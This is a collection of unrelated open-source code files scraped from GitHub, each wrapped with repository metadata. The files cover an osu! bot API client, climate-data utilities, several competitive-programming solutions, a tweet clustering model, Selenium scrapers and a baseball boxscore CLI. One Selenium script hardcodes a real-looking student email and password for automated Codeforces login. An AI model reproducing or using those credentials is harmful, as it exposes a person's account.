f\" | AR {self.ar}{f' ({mod_ar:.2f})' if mod_ar != original_ar else ''}\" \\\n f\" | ★ {self.stars:.2f}\"\n return message\n\n\nclass LetsApiClient:\n logger = logging.getLogger(\"lets_api\")\n\n def __init__(self, base: str, timeout: int = 5):\n self.base = base.rstrip(\"/\")\n self.timeout = timeout\n\n async def _request(self, url: str, params: Dict[str, Any]) -> Dict[Any, Any]:\n url = url.lstrip(\"/\")\n async with aiohttp.ClientSession() as session:\n with async_timeout.timeout(self.timeout):\n async with session.get(f\"{self.base}/{url}\", params=params) as response:\n try:\n self.logger.debug(f\"LETS request: GET {self.base}/{url} [{params}]\")\n return await response.json(loads=json.loads)\n except (ValueError, stdjson.JSONDecodeError):\n raise FatalLetsApiError(response)\n\n async def get_pp(\n self, beatmap_id: int,\n game_mode: GameMode = GameMode.STANDARD,\n mods: Mod = Mod.NO_MOD,\n accuracy: float = None\n ) -> LetsPPResponse:\n params = {\"b\": beatmap_id, \"m\": int(mods), \"g\": int(game_mode)}\n if accuracy is not None:\n params[\"a\"] = str(accuracy)\n r = await self._request(\"v1/pp\", params)\n status = r.get(\"status\")\n if status != 200:\n exc_info = r[\"message\"] if \"message\" in r else r\n self.logger.error(f\"LETS api error: {exc_info}\")\n raise LetsApiError(exc_info)\n self.logger.debug(r)\n return LetsPPResponse(**r, mods=mods, accuracy=accuracy)\n\n","repo_name":"xnyo/fokabot","sub_path":"utils/letsapi.py","file_name":"letsapi.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"17547574000","text":"from django import forms\nfrom .models import Image\n\nfrom imagekit.forms import ProcessedImageField\nfrom imagekit.processors import Transpose, Anchor, ResizeToFit\n\nclass NameForm(forms.Form):\n first_name = forms.CharField(label='Your first name', max_length=100)\n last_name = forms.CharField(label='Your last name', max_length=100)\n\nclass ImageForm(forms.ModelForm):\n image = ProcessedImageField(spec_id='mysite:htmx_fragments:image',\n processors=[\n Transpose(), # wipes meta to prevent rotation\n ResizeToFit(width=1920,height=1080,upscale=False,anchor=Anchor.CENTER),\n ],\n format='WEBP',\n options={'quality': 75})\n class Meta:\n model = Image\n fields = \"__all__\"\n","repo_name":"tpmac1990/django-svelte-rollup-multi-entrypoints","sub_path":"mysite/htmx_fragments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19563032287","text":"########################################################################\n # TIME AND AREA OPERATIONS\n # V.Predoi, University of Reading, May 2017\n########################################################################\nimport iris\n\n# slice cube over a restricted time period\ndef time_slice(mycube,yr1,mo1,d1,yr2,mo2,d2):\n \"\"\"\n Function that returns a subset of the original cube (slice)\n given two dates of interest date1 and date2\n date1 and date2 should be given in a yr,mo,d (int)format e.g.\n time_slice(cube,2006,2,2,2010,1,1) or time_slice(cube,'2006','2','2','2010','1','1');\n Returns a cube\n \"\"\"\n import datetime\n import iris.unit\n myDate1 = datetime.datetime(int(yr1),int(mo1),int(d1))\n myDate2 = datetime.datetime(int(yr2),int(mo2),int(d2))\n t1 = mycube.coord('time').units.date2num(myDate1)\n t2 = mycube.coord('time').units.date2num(myDate2)\n myConstraint = iris.Constraint(time=lambda t: t.point > t1 and t.point < t2)\n cubeslice = mycube.extract(myConstraint)\n return cubeslice\n\n# slice cube over a restricted area (box)\ndef area_slice(mycube, long1, long2, lat1, lat2):\n \"\"\"\n Function that subsets a cube on a box (long1,long2,lat1,lat2)\n This function is a restriction of masked_cube_lonlat();\n Returns a cube\n \"\"\"\n sublon = iris.Constraint(longitude=lambda cell: float(long1) <= cell <= float(long2))\n sublat = iris.Constraint(latitude=lambda cell: float(lat1) <= cell <= float(lat2))\n region_subset = mycube.extract(sublon & sublat)\n return region_subset\n\n# get the time average\ndef time_average(mycube):\n \"\"\"\n Function to get the time average over MEAN;\n Returns a cube\n \"\"\"\n var_mean = mycube.collapsed('time', iris.analysis.MEAN)\n return var_mean\n\n# get the probability a value is greater than a threshold\ndef proportion_greater(mycube, coord1, threshold):\n \"\"\"\n Function that returns the probability\n that a cetain variable coord1 (string) is greater than\n a threshold threshold (float or string), across a cube mycube;\n Returns a cube\n \"\"\"\n thr = float(threshold)\n result = mycube.collapsed(coord1, iris.analysis.PROPORTION,\n function=lambda values: values > thr)\n return result\n\n# get zonal means\ndef zonal_means(mycube, coord1, mean_type):\n \"\"\"\n Function that returns zonal means along a coordinate coord1;\n the type of mean is controlled by mean_type variable (string):\n 'mean' -> MEAN\n 'stdev' -> STD_DEV\n 'variance' -> VARIANCE\n\n Returns a cube\n \"\"\"\n if mean_type=='mean':\n result = mycube.collapsed(coord1, iris.analysis.MEAN)\n elif mean_type=='stdev':\n result = mycube.collapsed(coord1, iris.analysis.STD_DEV)\n elif mean_type=='variance':\n result = mycube.collapsed(coord1, iris.analysis.VARIANCE)\n return result\n\n# get the area average\ndef area_average(mycube, coord1, coord2):\n \"\"\"\n Function that determines the area average\n Can be used with coord1 and coord2 (strings,\n usually 'longitude' and 'latitude' but depends on the cube);\n Returns a cube\n \"\"\"\n import iris.analysis.cartography\n mycube.coord(coord1).guess_bounds()\n mycube.coord(coord2).guess_bounds()\n grid_areas = iris.analysis.cartography.area_weights(mycube)\n result = mycube.collapsed([coord1, coord2], iris.analysis.MEAN, weights=grid_areas)\n return result\n\n# get the seasonal mean\ndef seasonal_mean(mycube):\n \"\"\"\n Function to compute seasonal means with MEAN\n Chunks time in 3-month periods and computes means over them;\n Returns a cube\n \"\"\"\n import iris.coord_categorisation\n iris.coord_categorisation.add_season(mycube, 'time', name='clim_season')\n iris.coord_categorisation.add_season_year(mycube, 'time', name='season_year')\n annual_seasonal_mean = mycube.aggregated_by(['clim_season', 'season_year'], iris.analysis.MEAN)\n spans_three_months = lambda time: (time.bound[1] - time.bound[0]) == 2160\n three_months_bound = iris.Constraint(time=spans_three_months)\n return annual_seasonal_mean.extract(three_months_bound)\n\n# operate along a trajectory line\ndef trajectory_cube(mycube, long1, long2, lat1, lat2, plong1, plong2, plat1, plat2,samplecounts):\n \"\"\"\n Function that subsets a cube on a box (long1,long2,lat1,lat2)\n then creates a trajectory with waypoints (plong1,plong2,plat1, plat2),\n populates it with samplecounts number of points\n and subsets the cube along the trajectory\n \"\"\"\n from iris.analysis import trajectory\n sublon = iris.Constraint(longitude=lambda cell: float(long1) <= cell <= float(long2))\n sublat = iris.Constraint(latitude=lambda cell: float(lat1) <= cell <= float(lat2))\n wspd_subset = mycube.extract(sublon & sublat)\n pnts = [{'longitude': float(plong1), 'latitude': float(plat1)}, {'longitude': float(plong2), 'latitude': float(plat2)}]\n traj = trajectory.Trajectory(pnts, sample_count=int(samplecounts))\n lon = [d['longitude'] for d in traj.sampled_points]\n lat = [d['latitude'] for d in traj.sampled_points]\n sampled_points = [('longitude', lon),('latitude', lat)]\n section = trajectory.interpolate(wspd_subset, sampled_points)\n lon, lat = wspd_subset.coord('longitude').points, wspd_subset.coord('latitude').points\n return section, lon, lat\n","repo_name":"valeriupredoi/ESMValToolCodes","sub_path":"time_area_ops_suite.py","file_name":"time_area_ops_suite.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41456546859","text":"#\n# @lc app=leetcode id=238 lang=python3\n#\n# [238] Product of Array Except Self\n#\n\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n\n left = [1]\n\n right = [1]\n\n length = len(nums)\n\n temp = length-1\n\n for i in range(temp):\n\n left.append(left[-1]*nums[i])\n right.append(right[-1]*nums[temp-i])\n\n ans = list()\n for i in range(length):\n\n ans.append(left[i]*right[temp-i])\n\n return ans\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython/238.product-of-array-except-self.py","file_name":"238.product-of-array-except-self.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18943600607","text":"from clustering.user import User\nfrom clustering.features import (bag_of_words, bag_of_hashtags,\n user_retweet_related)\n# from clustering.features import (bag_of_bigrams, user_description,\n# user_location, user_name, user_is_verified, user_sum_favourites,\n# user_sum_retweet_count)\nfrom sklearn.cluster import KMeans\nfrom sklearn.pipeline import Pipeline\nfrom featureforge.vectorizer import Vectorizer\n# from sklearn.preprocessing import StandardScaler\n\n\nclass Model(object):\n \"\"\"docstring for Model\"\"\"\n\n def __init__(self, tweets):\n self.tweets = tweets\n self.users = users = dict()\n self.get_users()\n features = [\n bag_of_words,\n bag_of_hashtags,\n user_retweet_related(users),\n # user_description,\n # bag_of_bigrams,\n # user_location,\n # user_name,\n # user_is_verified,\n # user_sum_favourites,\n # user_sum_retweet_count,\n ]\n vect = Vectorizer(features)\n # scaler = StandardScaler(with_mean=False)\n clf = KMeans(init='k-means++', n_clusters=8)\n # self.pipeline = Pipeline(steps=[('vect', vect), ('scl', scaler), ('clf', clf)])\n self.pipeline = Pipeline(steps=[('vect', vect), ('clf', clf)])\n self.users_list = list(users.values())\n self.pipeline.fit(self.users_list)\n self.labels = self.pipeline.steps[1][1].labels_\n\n def get_users(self):\n users = self.users\n for tweet in self.tweets:\n if tweet['text'][:2] != 'RT':\n tweet['is_retweet'] = False\n self.add_user(tweet)\n else:\n # si es un retweet, tambien se agrega al usuario que creo el tweet.\n try:\n # puede no estar este campo. En ese caso ignoramos el tweet.\n source_tweet = tweet['retweeted_status']\n except KeyError:\n continue\n\n source_tweet['is_retweet'] = False\n tweet['is_retweet'] = True\n tweet['text'] = None # source_tweet['text']\n self.add_user(tweet)\n self.add_user(source_tweet)\n\n # actualizar atributos relacionados a retweet\n uid = tweet['user']['id']\n retweeted_uid = source_tweet['user']['id']\n users[uid].retweeted_to.append(retweeted_uid)\n users[retweeted_uid].retweeted_by.append(uid)\n\n def add_user(self, tweet):\n users = self.users\n user_id = tweet['user']['id']\n if user_id in users.keys():\n u = users[user_id]\n u.update(tweet)\n else:\n u = User(tweet)\n users[user_id] = u\n\n return users\n","repo_name":"acapello/PLN-2015","sub_path":"clustering/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"15019971899","text":"N = int(input())\r\nimos = [0 for i in range(1443)]\r\n \r\ndef mystart(a_minute):\r\n while(1):\r\n if a_minute % 5 == 0 : break\r\n a_minute -=1\r\n return a_minute\r\n \r\ndef myend(a_minute):\r\n while(1):\r\n if a_minute % 5 == 0 : break\r\n a_minute += 1\r\n return a_minute\r\n \r\ndef output_time(a_minute):\r\n h = a_minute // 60\r\n h = '%02d'% h\r\n m = a_minute % 60\r\n m = '%02d'% m\r\n return h+m \r\n\r\nnums = []\r\n\r\nfor i in range(N):\r\n time = [t for t in input().split(\"-\")]\r\n time = [int(t[:2])*60 + int(t[2:]) for t in time]\r\n time = [mystart(time[0]),myend(time[1])]\r\n nums.append(time)\r\n \r\nfor n in nums:\r\n imos[n[0]] += 1\r\n imos[n[1]+1] -= 1\r\n\r\nans = []\r\nj = 0\r\nfor i in imos:\r\n ans.append(j+i)\r\n j += i\r\n \r\nstart,end,flag = 0,0,False\r\n \r\nfor i in range(len(ans)):\r\n if ans[i] == 0 and flag == False : continue\r\n elif ans[i] == 0 and flag == True:\r\n end = i\r\n print(output_time(start) + \"-\" + output_time(end-1))\r\n start,end,flag = 0,0,False\r\n elif ans[i] != 0 and flag == False :\r\n start = i\r\n flag = True\r\n else:\r\n continue","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc001/D/4924158.py","file_name":"4924158.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"42964415598","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('about', views.about, name='about'),\n path('register', views.register, name='register'),\n path('login', views.login_view, name='login'),\n\n path('students_courses', views.students_courses, name='students_courses'),\n path('ege_courses', views.ege_courses, name='ege_courses'),\n path('course_edit', views.course_edit, name='course_edit'),\n path('course_delete/', views.course_delete, name='course_delete'),\n path('course_add', views.course_add, name='course_add'),\n path('course_subscription//', views.course_subscription, name='course_subscription'),\n path('my_courses', views.my_courses, name='my_courses'),\n path('course_details/', views.course_details, name='course_details'),\n\n path('course//delete/', views.course_delete_from_my_list, name='course_delete_from_my_list'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Danila-Timonin/Lab3","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23424750470","text":"import os\nimport time\nimport sys\n# comment out below line to enable tensorflow outputs\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom core.functions import *\nfrom polytrack.track import track\nfrom polytrack.bg_subtraction import foreground_changes\nfrom polytrack.record import record_track, complete_tracking\nfrom polytrack.config import pt_cfg\nfrom polytrack.flowers import record_flowers\nfrom polytrack.general import *\nimport cv2\nimport numpy as np\n# import warnings; warnings.simplefilter('ignore')\nfrom datetime import datetime\nfrom absl import app\n\n\ndef main(_argv):\n start_time = datetime.now()\n start_time_py = time.time()\n print(\"Start: \" + str(start_time))\n nframe = 0\n # total_frames = 0\n # flowers_recorded = False\n # predicted_position =[]\n\n video_list = get_video_list(pt_cfg.POLYTRACK.INPUT_DIR, pt_cfg.POLYTRACK.VIDEO_EXT)\n\n for video_name in video_list:\n \n print('===================' + str(video_name) + '===================')\n\n video = str(pt_cfg.POLYTRACK.INPUT_DIR) + str(video_name)\n\n # begin video capture\n try:\n vid = cv2.VideoCapture(int(video))\n except:\n vid = cv2.VideoCapture(video)\n\n \n width, height, _ = get_video_details(vid)\n converter = cv2.VideoWriter(str(pt_cfg.POLYTRACK.OUTPUT)+str(video_name)+'.avi', cv2.VideoWriter_fourcc(*'DIVX'), 30, (width, height))\n \n while True:\n return_value, frame = vid.read()\n if return_value:\n nframe += 1\n\n \n # cv2.imshow(\"frame\", frame)\n converter.write(frame)\n\n # idle = check_idle(nframe, predicted_position)\n # insectsBS = foreground_changes(frame, width, height, nframe, idle)\n # associated_det_BS, associated_det_DL, missing,new_insect = track(frame, predicted_position, insectsBS)\n # for_predictions = record_track(frame, nframe,associated_det_BS, associated_det_DL, missing, new_insect, idle)\n # predicted_position = predict_next(for_predictions)\n\n fps = round(nframe/ (time.time() - start_time_py),2)\n print(str(nframe) + ' frames processed | ' + str(fps) +' FPS ' , end='\\r')\n\n\n if cv2.waitKey(1) & 0xFF == ord('q'): break\n \n else:\n print()\n print('Video has ended')\n break\n\n if not pt_cfg.POLYTRACK.CONTINUOUS_VIDEO:\n pass\n # complete_tracking(predicted_position)\n # predicted_position =[]\n # pt_cfg.POLYTRACK.RECORDED_DARK_SPOTS = []\n # flowers_recorded = False\n \n\n cv2.destroyAllWindows()\n complete_tracking(predicted_position)\n end_time = datetime.now()\n print()\n print(\"End: \" + str(end_time))\n print(\"Processing Time: \" + str(end_time-start_time))\n\n\n\n\n\nif __name__ == '__main__':\n try:\n app.run(main)\n except SystemExit:\n pass\n\n","repo_name":"malikaratnayake/Polytrack2.0","sub_path":"video_converter.py","file_name":"video_converter.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"14201891881","text":"from math import sqrt\n\n\ndef prime(number):\n if number <= 3:\n return number > 1\n elif number % 2 == 0 or number % 3 == 0:\n return False\n i = 5\n while i ** 2 <= number:\n if number % i == 0 or number % (i + 2) == 0:\n return False\n i += 6\n return True\n\n\ndef nexttopright(value):\n n = (sqrt(value) - 1) / 2\n return int((2*(n+1) + 1) ** 2)\n\n\ndef nextbotright(value):\n n = (sqrt(4*value - 3) + 1) / 4\n return int(4*((n+1) ** 2) - 2*(n+1) + 1)\n\n\ndef nextbotleft(value):\n n = (sqrt(value - 1)) / 2\n return int(4*((n+1)**2) + 1)\n\n\ndef nexttopleft(value):\n n = (sqrt(4*value - 3) - 1) / 4\n return int(4*((n+1) ** 2) + 2*(n+1) + 1)\n\n\ntarget = 10\n\nspiralsize = 7 # initial spiral size\nseqlength = (spiralsize // 2) + 1 # length of diagonals from centre given spiral size\n\ntopright = [(2*n + 1)**2 for n in range(seqlength)] # sequence (2n+1)^2 OR 4n^2 + 4n + 1\nbotright = [(4*(n**2) - 2*n + 1) for n in range(1, seqlength)] # sequence 4n^2 - 2n + 1\nbotleft = [(4*(n**2) + 1) for n in range(1, seqlength)] # sequence 4n^2 + 1\ntopleft = [(4*(n**2) + 2*n + 1) for n in range(1, seqlength)] # sequence 4n^2 + 2n +1\n\ntoprightp = [prime(v) for v in topright]\nbotrightp = [prime(v) for v in botright]\nbotleftp = [prime(v) for v in botleft]\ntopleftp = [prime(v) for v in topleft]\n\ncurrentsize = spiralsize\nfound = False\nwhile not found:\n allpbools = list(toprightp) + list(botrightp) + list(botleftp) + list(topleftp)\n noprime, total = allpbools.count(True), len(allpbools)\n ratiopercent = noprime / total * 100\n if ratiopercent < target:\n found = True\n break\n else:\n currentsize += 2\n topright.append(nexttopright(topright[-1]))\n botright.append(nextbotright(botright[-1]))\n botleft.append(nextbotleft(botleft[-1]))\n topleft.append(nexttopleft(topleft[-1]))\n\n toprightp.append(prime(topright[-1]))\n botrightp.append(prime(botright[-1]))\n botleftp.append(prime(botleft[-1]))\n topleftp.append(prime(topleft[-1]))\n\nprint(\"First spiral side length to have 10 percent or fewer primes along diagonals: %s\" % currentsize)\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#58 - Spiral Primes.py","file_name":"#58 - Spiral Primes.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36518468032","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: deleteNode\n Description :\n Author : lwq\n date: 2019-07-24\n-------------------------------------------------\n Change Activity:\n 2019-07-24:\n-------------------------------------------------\n\"\"\"\n__author__ = 'lwq'\n\n\"\"\"\n删除链表的倒数第N个节点\n给定一个链表,删除链表的倒数第 n 个节点,并且返回链表的头结点。\n\n示例:\n\n给定一个链表: 1->2->3->4->5, 和 n = 2.\n\n当删除了倒数第二个节点后,链表变为 1->2->3->5.\n说明:\n\n给定的 n 保证是有效的。\n\n进阶:\n\n你能尝试使用一趟扫描实现吗?\n\"\"\"\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def removeNthFromEnd(head,n):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n pre = head\n cur = head\n for i in range(n):\n cur = cur.next\n\n if cur:\n while cur.next:\n cur = cur.next\n pre = pre.next\n pre.next = pre.next.next\n return head\n else:\n return pre.next\n\n\nif __name__ == '__main__':\n a = ListNode(1)\n b = ListNode(2)\n c = ListNode(3)\n d = ListNode(4)\n a.next = b\n b.next = c\n c.next = d\n tmp_a = a\n\n while (tmp_a):\n print(tmp_a.val)\n tmp_a = tmp_a.next\n\n Solution.removeNthFromEnd(a,2)\n print(\"+\" * 20)\n\n while (a):\n print(a.val)\n a = a.next\n","repo_name":"Lwq1997/leetcode-python","sub_path":"primary_algorithm/list/removeNthFromEnd.py","file_name":"removeNthFromEnd.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23981373430","text":"import yaml\n\nwith open(\"info.yaml\") as f:\n\tdoc = yaml.safe_load(f)\n\ntop_name = doc[\"project\"][\"top_module\"]\n\nwith open(\"src/top.v\", \"w\") as f2:\n\twith open(\"src/top_r.v\") as f:\n\t\twhile True:\n\t\t\tline = f.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tf2.write(line)\n\t\tf2.write(\"\\n\")\n\twith open(\"src/top_template.v\") as f:\n\t\twhile True:\n\t\t\tline = f.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tline = line.replace(\"{namehere}\", top_name)\n\t\t\tf2.write(line)\n\t\tf2.write(\"\\n\")\n","repo_name":"AvalonSemiconductors/tt04-logisim-auto","sub_path":"scripts/gen_toplevel.py","file_name":"gen_toplevel.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71901949673","text":"import time\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport os\r\nfrom selenium.webdriver.common.by import By\r\n\r\ndriver = webdriver.Chrome()\r\ndef register(email='abdelrahim.abdelaal@student.guc.edu.eg',password='ilovecode303'):\r\n\r\n\turl = \"https://codeforces.com/enter?back=%2F\"\r\n\tdriver.get(url)\r\n\tdriver.find_element(By.ID,\"handleOrEmail\").send_keys(email)\r\n\tdriver.find_element(By.ID,\"password\").send_keys(password)\r\n\ttime.sleep(1)\r\n\tstr=\"/html/body/div[7]/div[4]/div/div/div/form/table/tbody/tr[4]/td/input\"\r\n\tstr2=r'//*[@id=\"enterForm\"]/table/tbody/tr[4]/td/div[1]/input'\r\n\tdriver.find_element(By.XPATH,str2).click()\r\n\ttime.sleep(5)\r\n\tprint(\"done\")\r\n\r\nregister()\r\n\r\n\r\n\r\n\r\ndef solve(id):\r\n\tlanguages = [\"GNU G++17 7.3.0\",\"Java 17 64bit\",\"PyPy 3.6.9 (7.3.0)\"]\r\n\t# extensions = ['cpp','java','py']\r\n\tpart1=\"\"\r\n\tpart2=\"\"\r\n\tl=len(id)\r\n\tfor x in range(l):\r\n\t\tif id[x].isdigit():\r\n\t\t\tpart1+=id[x]\r\n\t\telse :\r\n\t\t\tpart2=id[x:]\r\n\t\t\tbreak\r\n\r\n\r\n\tdriver.get('https://codeforces.com/problemset/submit' )\r\n\r\n\tpath_of_the_problem=f\"C:\\\\Users\\DELL\\\\Desktop\\solutions\\\\bard\\\\cpp\\\\{id}.cpp\"\r\n\r\n\r\n\t#to submit file\r\n\r\n\tdriver.find_element(By.XPATH,'//*[@id=\"pageContent\"]/form/table/tbody/tr[1]/td[2]/input').send_keys(id)\r\n\tdropDown=Select(driver.find_element(By.XPATH,'//*[@id=\"pageContent\"]/form/table/tbody/tr[3]/td[2]/select'))\r\n\tdropDown.select_by_visible_text(languages[0])\r\n\tfile_input=driver.find_element(By.XPATH,'//*[@id=\"pageContent\"]/form/table/tbody/tr[5]/td[2]/input')\r\n\ttime.sleep(5)\r\n\tfile_input.send_keys(path_of_the_problem)\r\n\ttime.sleep(5)\r\n\tdriver.find_element('xpath',\"//input[@value='Submit']\").click()\r\n\ttime.sleep(6)\r\ncnt=0\r\nfor root_dir, cur_dir, files in os.walk(f\"C:\\\\Users\\\\DELL\\\\Desktop\\\\solutions\\\\bard\\\\cpp\"):\r\n\tfor i in range(len(files)):\r\n\t\tprint(files[i].split(\".\")[0])\r\n\t\tsolve(files[i].split('.')[0])\r\n\t\tcnt+=1\r\n\t\tprint(cnt,'/',len(files))\r\n\r\n\r\n\r\n","repo_name":"abdoo303/AI-and-Problem-Solving","sub_path":"problem_submitter.py","file_name":"problem_submitter.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38076166339","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport urllib.request\n\n'''\n셀레니움을 활용한 웹 크롤링\n'''\n\n# 크롬 드라이버를 불러와서 driver 변수로 저장\ndriver = webdriver.Chrome('/Users/youngseonkim/Documents/crawling_practice/chromedriver')\n\n# 크롬을 실행해서 이동하고자하는 URL 주소로 실행\ndriver.get(\"https://www.youtube.com\")\n\n# HTML 태그중 name == search_query 인 태그를 가져옴 \nelem = driver.find_element_by_name(\"search_query\")\n\n# 해당 태그에 input 값을 임의로 지정\nelem.send_keys(\"I can't stop me 커버\")\n\n# Enter 치는 것과 같은 역할 수행\nelem.send_keys(Keys.RETURN)\n\n# 3초동안 코드 진행을 멈춤, 브라우저가 로딩될 때 까지 기다리기 위해 사용\ntime.sleep(3)\n\n# Scroll Down 하는 코드\nSCROLL_PAUSE_TIME = 1.0\n\n# Get scroll height\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n \n\n\n# css class 중 입력된 값에 해당하는 태그를 찾아 첫번째 element를 클릭한다\n# driver.find_elements_by_css_selector(\".style-scope.yt-img-shadow\")[0].click()\n\n# css class 중 입력된 값에 해당하는 태그를 찾아 src attribute의 src를 가져옴\n# driver.find_element_by_css_selector(\".style-scope.yt-img-shadow\").get_attribute(\"src\")\n\n# urllib.request.urlretrieve(img_url, \"test.jpg\")\n# img = driver.find_element_by_tag_name(\"img\")\nimages = driver.find_elements_by_css_selector(\"img.style-scope.yt-img-shadow\")\n\ncount = 1\nthumbnail_num = 1\nfor image in images:\n try:\n img_url = image.get_attribute(\"src\")\n print(img_url)\n urllib.request.urlretrieve(img_url, str(thumbnail_num) + '.jpg')\n thumbnail_num += 1\n except:\n pass\ndriver.close()\n\n","repo_name":"ysk1026/youtube_crawling","sub_path":"google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25904588929","text":"#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport argparse\nimport json\nimport copy\nimport re\n\nimport pprint as pp\n\nfrom boxscore_cli.tools_mlbapi import *\nfrom boxscore_cli.tools_linescore import *\nfrom boxscore_cli.tools_boxscore import *\nfrom boxscore_cli.tools_boxscore import *\nfrom boxscore_cli.extractors_boxscore import *\nfrom boxscore_cli.formatters_linescore import *\nfrom boxscore_cli.formatters_boxscore import *\n\n\ndef print_linescore(gamePk, debug=False, wide=False):\n game_data = download_game_data(gamePk, debug=debug)\n dense_lines, _ = format_linescore(\n extract_linescore_innings(game_data),\n extract_teams_data(game_data),\n venue=extract_venue_name(game_data),\n decision_dict=extract_decisions(game_data),\n wide_display=wide,\n )\n print()\n [print(line) for line in dense_lines]\n print()\n\n\ndef main():\n ### parse CLI arguments\n\n parser = argparse.ArgumentParser(\n prog=\"boxscore\",\n description=\"cfrontin's CLI boxscore and linescore printer\",\n epilog=\"strike three!\\a\\n\",\n )\n parser.add_argument(\"-l\", \"--line\", action=\"store_true\", default=False)\n parser.add_argument(\"-b\", \"--box\", action=\"store_true\", default=False)\n parser.add_argument(\"-g\", \"--game\", action=\"store\", default=None, type=int)\n parser.add_argument(\"-w\", \"--wide\", action=\"store_true\", default=False)\n parser.add_argument(\"--debug\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n ### do functionality\n\n if args.line:\n print_linescore(args.game, debug=args.debug, wide=args.wide)\n\n if args.box:\n game_data = download_game_data(args.game, debug=args.debug)\n print(\"\\n\")\n print(extract_gamedate(game_data))\n print(extract_venue_name(game_data))\n print()\n lines_dense, lines_sparse = format_linescore(\n extract_linescore_innings(game_data),\n extract_teams_data(game_data),\n use_top_spacing_line=False,\n use_bottom_spacing_line=False,\n horz_char=\" \",\n vert_char=\" \",\n cross_char=\" \",\n wide_display=args.wide,\n )\n do_dense = True\n if do_dense:\n [print(line) for line in lines_dense]\n else:\n [print(line) for line in lines_sparse]\n print()\n batter_list = extract_boxscore_batter(game_data)\n pitcher_list = extract_boxscore_pitcher(game_data)\n line_batters_dict = format_batters(batter_list, wide_display=args.wide)\n line_pitchers_dict = format_pitchers(pitcher_list, wide_display=args.wide)\n for tmkey in (\"away\", \"home\"):\n print(\" \", extract_teams_data(game_data)[tmkey], sep=\"\")\n print()\n [print(x) for x in line_batters_dict[tmkey]]\n print()\n [print(x) for x in line_pitchers_dict[tmkey]]\n print()\n info_line_tmkey = extract_info_team(game_data, home_team=(tmkey == \"home\"))\n [\n print(x)\n for x in format_info_team(info_line_tmkey, wide_display=args.wide)\n ]\n print()\n info_line_box = extract_info_box(game_data)\n [print(x) for x in format_info_box(info_line_box, wide_display=args.wide)]\n print()\n\n if args.game and (not args.line) and (not args.box): # exploration mode\n game_data = download_game_data(args.game, debug=args.debug)\n print()\n pp.pprint(game_data, compact=True, indent=1, depth=2)\n # print()\n # pp.pprint(extract_linescore_data(game_data), compact=True, indent=1, depth=2)\n # print()\n # print(extract_teams_data(game_data)[\"away\"])\n # print(extract_teams_data(game_data)[\"home\"])\n # print()\n # print(extract_linescore_innings(game_data))\n # print()\n # print([x.get_appetite() for x in extract_linescore_innings(game_data)])\n # print()\n # lines_dense, lines_sparse = format_linescore(\n # extract_linescore_innings(game_data),\n # extract_teams_data(game_data),\n # venue=extract_venue_name(game_data),\n # decision_dict=extract_decisions(game_data),\n # )\n # print(\"dense linescore:\\n\")\n # [print(x) for x in lines_dense]\n # print()\n # print(\"sparse linescore:\\n\")\n # [print(x) for x in lines_sparse]\n 